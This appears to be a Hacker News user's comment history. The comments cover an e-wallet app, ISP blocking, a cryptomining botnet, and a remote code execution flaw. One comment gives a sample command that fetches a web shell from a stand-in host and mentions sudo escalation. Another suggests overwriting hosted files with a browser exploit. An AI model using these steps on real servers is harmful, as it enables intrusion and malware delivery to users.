Hacker News | ricANNArdo's comments

The Philippines' most popular e-wallet app, GCash, outright closes when developer mode is enabled, with a popup saying that the device has "settings [enabled] that are not secure".


> Also, in this scenario what would stop users from using domain fronting or encrypted SNI to access other Facebook services?

That any day the ISP can kill those "bugs", making them useless, especially for those who bought them in the form of paid VPNs, and if it doesn't, they will "block" you from the service, from not allowing you to initiate an LTE connection and locking you to 3G, to not letting you connect to the cell site at all.


If you go to the pool website with the address specified on the botnet, you can see how much was mined. The main article [1] linked on the news said:

> The actor has been able to mine about 630 XMR to date, which at the current USD rate is more than $172,000 for just a little more than one year of activity.

[1]: https://www.fortinet.com/blog/threat-research/yet-another-cr...


that makes more sense, thanks.


Remote code execution, e.g. he can also execute 'wget http://bad.php.script/shell.php' for planting a shell or 'sudo <command>' for privilege execution (up to root). So pretty much everything you can do on their Twitter servers.


> 'sudo <command>' for privilege execution

Well, I hope it's not too much to expect the webserver user not to have sudo permissions.


Another "fun" thing to do is if the hosted data is just sitting there, wget a browser exploit file on top of it.

This is probably not a serious concern for a place as huge as Twitter because they're going to CDN static content separately from dynamic content, but would be really exciting for "I got me one server for my whole startup" types. Maybe you could bypass existing systems to serve up malicious code to end users anyway.

